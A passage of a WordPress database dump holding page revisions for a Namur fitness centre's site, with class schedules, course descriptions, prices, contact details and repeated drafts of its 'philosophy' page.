#eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 19:38:20', '2013-07-04 19:38:20', '', 11, 'http://www.crosstrainingcenter.be/11-revision-105/', 0, 'revision', '', 0),
(286, 1, '2013-07-03 20:45:05', '2013-07-03 20:45:05', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de Team Training, Duo Training, Personnal Trainer ou Coatching nutritionnel se font exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:45:05', '2013-07-03 20:45:05', '', 9, 'http://www.crosstrainingcenter.be/9-revision-16/', 0, 'revision', '', 0),
(287, 1, '2013-07-04 18:19:03', '2013-07-04 18:19:03', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de Team Training, Duo Training, Personnal Trainer ou Coatching nutritionnel se font exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1>&nbsp;</h1>\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-04 18:19:03', '2013-07-04 18:19:03', '', 9, 'http://www.crosstrainingcenter.be/9-revision-17/', 0, 'revision', '', 0),
(288, 1, '2013-07-04 18:50:46', '2013-07-04 18:50:46', '', 'illu1', '', 'inherit', 'open', 'open', '', 'illu1', '', '', '2013-07-04 18:50:46', '2013-07-04 18:50:46', '', 5, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/illu1.png', 0, 'attachment', 'image/png', 0),
(289, 1, '2013-07-03 20:45:08', '2013-07-03 20:45:08', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-102 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-103 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-03 20:45:08', '2013-07-03 20:45:08', '', 5, 'http://www.crosstrainingcenter.be/5-revision-35/', 0, 'revision', '', 0),
(290, 1, '2013-07-04 18:51:42', '2013-07-04 18:51:42', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/illu1.png\"><img class=\"size-full wp-image-288 alignleft\" alt=\"illu1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/illu1.png\" width=\"271\" height=\"197\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-103 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 18:51:42', '2013-07-04 18:51:42', '', 5, 'http://www.crosstrainingcenter.be/5-revision-36/', 0, 'revision', '', 0),
(292, 1, '2013-07-04 18:52:28', '2013-07-04 18:52:28', '<h1>Assurer un entraînement de qualité :</h1>\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-103 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 18:52:28', '2013-07-04 18:52:28', '', 5, 'http://www.crosstrainingcenter.be/5-revision-38/', 0, 'revision', '', 0),
(294, 1, '2013-07-04 19:00:43', '2013-07-04 19:00:43', '<h1>Assurer un entraînement de qualité :</h1>\r\n&nbsp;\r\n<blockquote>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n<h1></h1>\r\n</blockquote>\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:00:43', '2013-07-04 19:00:43', '', 5, 'http://www.crosstrainingcenter.be/5-revision-40/', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(295, 1, '2013-07-04 19:01:11', '2013-07-04 19:01:11', '<h1>Assurer un entraînement de qualité :</h1>\r\n&nbsp;\r\n<blockquote>\r\n<h4>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.</h4>\r\n<h1></h1>\r\n</blockquote>\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:01:11', '2013-07-04 19:01:11', '', 5, 'http://www.crosstrainingcenter.be/5-revision-41/', 0, 'revision', '', 0),
(297, 1, '2013-07-04 19:04:28', '2013-07-04 19:04:28', '<h1>Assurer un entraînement de qualité :</h1>\r\n[caption id=\"attachment_102\" align=\"alignnone\" width=\"300\"]<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a> <br><br>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.[/caption]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:04:28', '2013-07-04 19:04:28', '', 5, 'http://www.crosstrainingcenter.be/5-revision-43/', 0, 'revision', '', 0),
(296, 1, '2013-07-04 19:02:56', '2013-07-04 19:02:56', '<h1>Assurer un entraînement de qualité :</h1>\r\n[caption id=\"attachment_102\" align=\"alignnone\" width=\"300\"]<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a> Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.[/caption]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:02:56', '2013-07-04 19:02:56', '', 5, 'http://www.crosstrainingcenter.be/5-revision-42/', 0, 'revision', '', 0),
(298, 1, '2013-07-04 19:07:45', '2013-07-04 19:07:45', '<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:07:45', '2013-07-04 19:07:45', '', 5, 'http://www.crosstrainingcenter.be/5-revision-44/', 0, 'revision', '', 0),
